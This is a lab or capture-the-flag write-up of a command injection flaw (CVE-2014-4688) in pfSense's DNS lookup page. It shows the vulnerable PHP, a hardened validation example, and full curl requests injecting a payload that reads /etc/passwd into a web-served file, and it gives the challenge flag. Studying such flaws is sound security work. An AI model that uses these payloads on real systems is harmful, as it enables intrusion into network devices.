0x0 Vulnerability information

  • pfSense is an open-source firewall distribution with commercial backing, a long history and a large user base
  • CVE ID: CVE-2014-4688, reference link
  • The explanations of this vulnerability found online are vague, and some were evidently published without ever being tested
  • This article is based on installing and testing in a real environment

0x1 Root cause

  • Complete the installation from the provided ISO and extract the target page
  • diag_dns.php (the relevant part of the createalias handler; the rest of the handler is omitted)

    /* Cheap hack to support both $_GET and $_POST */
    if ($_GET['host'])
        $_POST = $_GET;

    if($_GET['createalias'] == "true") {
        $host = trim($_POST['host']);
        if($_GET['override'])
            $override = true;
        $a_aliases = &$config['aliases']['alias'];
        $type = "hostname";
        $resolved = gethostbyname($host);
        if($resolved) {
            $host = trim($_POST['host']);
            /* $host is interpolated unescaped into a shell pipeline run by /bin/sh */
            $dig=`dig "$host" A | grep "$host" | grep -v ";" | awk '{ print $5 }'`;
            /* ... remainder of the alias-creation handler omitted ... */
        }
    }

  • Here $_POST['host'] is passed, after nothing more than trim(), straight into the backtick-executed dig pipeline. Any shell metacharacter in host is interpreted by /bin/sh: a classic command injection. Two details matter for exploitation. First, createalias is read only from $_GET, so it must be in the query string, while host may stay in the POST body (or, thanks to the "cheap hack" at the top, be supplied via GET as well). Second, the gethostbyname() check gives no protection: PHP's gethostbyname() returns the hostname unchanged when resolution fails, so $resolved is truthy for every non-empty input and the injected string reaches the shell whether or not it resolves.
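To make the two missing checks concrete, here is an added example (my own code, not pfSense's): a syntactic hostname validator, a resolver check that does not trust the failure value of gethostbyname(), and the dig pipeline rebuilt with escapeshellarg(). The function names are hypothetical, the command strings are only built and printed (never executed), and the sample input is the payload used in the exploitation section of this write-up.

```php
<?php
declare(strict_types=1);

// Added example, not pfSense code. It shows the two checks diag_dns.php was
// missing: syntactic validation of $host before anything else, and shell
// escaping when the value is handed to dig. Function names are hypothetical.

// RFC 1123 hostname: labels of [A-Za-z0-9-], 1-63 chars, no leading/trailing
// hyphen, total length <= 253. Rejects quotes, ';', spaces, '>' and so on.
function is_valid_hostname(string $host): bool {
    if ($host === '' || strlen($host) > 253) {
        return false;
    }
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return preg_match('/^' . $label . '(?:\.' . $label . ')*\.?$/', $host) === 1;
}

// gethostbyname() returns its argument unchanged on failure, so the original
// `if ($resolved)` test is always true for a non-empty string. Only accept a
// result that is actually an IPv4 address.
function resolve_strict(string $host): ?string {
    $resolved = gethostbyname($host);
    return filter_var($resolved, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false
        ? null
        : $resolved;
}

// The command string exactly as the vulnerable page builds it (not executed here).
function build_command_vulnerable(string $host): string {
    $host = trim($host);
    return "dig \"$host\" A | grep \"$host\" | grep -v \";\" | awk '{ print \$5 }'";
}

// Hardened form: validate first, then escapeshellarg() every interpolated value.
// Returns null when the host is rejected, so nothing reaches the shell at all.
function build_command_safe(string $host): ?string {
    $host = trim($host);
    if (!is_valid_hostname($host)) {
        return null;
    }
    $arg = escapeshellarg($host);
    return "dig $arg A | grep $arg | grep -v ';' | awk '{ print \$5 }'";
}

// Constructed sample input: the payload from the write-up.
$payload = '1";md5 /etc/passwd >pick.txt;';

echo "vulnerable: ", build_command_vulnerable($payload), PHP_EOL;
echo "validated : ", var_export(is_valid_hostname($payload), true), PHP_EOL;
echo "safe      : ", var_export(build_command_safe($payload), true), PHP_EOL;
echo "safe (ok) : ", build_command_safe('example.com'), PHP_EOL;
```

Run it with `php example.php`. The validator rejects the payload outright, and for a legitimate name the escaped form wraps each interpolated value in single quotes, so a `"` or `;` inside the value can never terminate the dig argument. resolve_strict() replaces the original truthiness test: only an actual IPv4 string counts as a successful lookup.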

0x2 Exploitation

  1. First, use the DNS Lookup feature once normally in Chrome, so that the browser produces a valid request (session cookie, __csrf_magic token and form fields)

    image-20220228141955472.png

  2. Then intercept or replay that request with Burp or curl; the curl equivalent of the browser request is

    curl 'http://1.2.3.4:8080/diag_dns.php' \
      -H 'Connection: keep-alive' \
      -H 'Pragma: no-cache' \
      -H 'Cache-Control: no-cache' \
      -H 'Origin: http://1.2.3.4:8080' \
      -H 'Upgrade-Insecure-Requests: 1' \
      -H 'DNT: 1' \
      -H 'Content-Type: application/x-www-form-urlencoded' \
      -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36' \
      -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
      -H 'Referer: http://1.2.3.4:8080/diag_dns.php' \
      -H 'Accept-Language: zh-CN,zh;q=0.9' \
      -H 'Cookie: PHPSESSID=4889d81a3982b9cbc565fd8fcef16cb8; cookie_test=1646032654' \
      --data-raw '__csrf_magic=sid%3A55d48fa80daf46be0b8606e5993831c8dec87612%2C1646029064&host=1.2.3.4&Submit=DNS+Lookup' \
      --compressed \
      --insecure
  3. Next, add the createalias GET parameter and inject into the host parameter. The two changes are:

    1. URL: curl 'http://1.2.3.4:8080/diag_dns.php?createalias=true'
    2. host parameter: &host=1";md5 /etc/passwd >pick.txt;&

    How the payload works: dig is invoked as dig "$host" A, so the leading 1" closes the quoted argument and the first ; ends the dig command. md5 /etc/passwd >pick.txt then runs as a separate command and writes its output to pick.txt (md5 is the FreeBSD digest utility that pfSense ships, hence md5 rather than md5sum). The trailing ; leaves the rest of the pipeline as a syntactically valid remainder that fails harmlessly after md5 has already run. The session cookie and the __csrf_magic token come from the logged-in browser session, so this is an authenticated injection: a valid webGUI login is required.
  4. The modified request is as follows

    curl 'http://1.2.3.4:8080/diag_dns.php?createalias=true' \
      -H 'Connection: keep-alive' \
      -H 'Pragma: no-cache' \
      -H 'Cache-Control: no-cache' \
      -H 'Origin: http://1.2.3.4:8080' \
      -H 'Upgrade-Insecure-Requests: 1' \
      -H 'DNT: 1' \
      -H 'Content-Type: application/x-www-form-urlencoded' \
      -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36' \
      -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
      -H 'Referer: http://1.2.3.4:8080/diag_dns.php' \
      -H 'Accept-Language: zh-CN,zh;q=0.9' \
      -H 'Cookie: PHPSESSID=4889d81a3982b9cbc565fd8fcef16cb8; cookie_test=1646032654' \
      --data-raw '__csrf_magic=sid%3A55d48fa80daf46be0b8606e5993831c8dec87612%2C1646029064&host=1";md5 /etc/passwd >pick.txt;&Submit=DNS+Lookup' \
      --compressed \
      --insecure
  5. Finally, open pick.txt in the browser: the file was created in the webGUI document root, so fetching it over HTTP returns the output of the injected command

    image-20220228142417302.png

  6. Per the challenge requirements, the flag is: flag{0ca0c0336fc307ab3d7fcc3e33590d41}
Last modification: June 8, 2022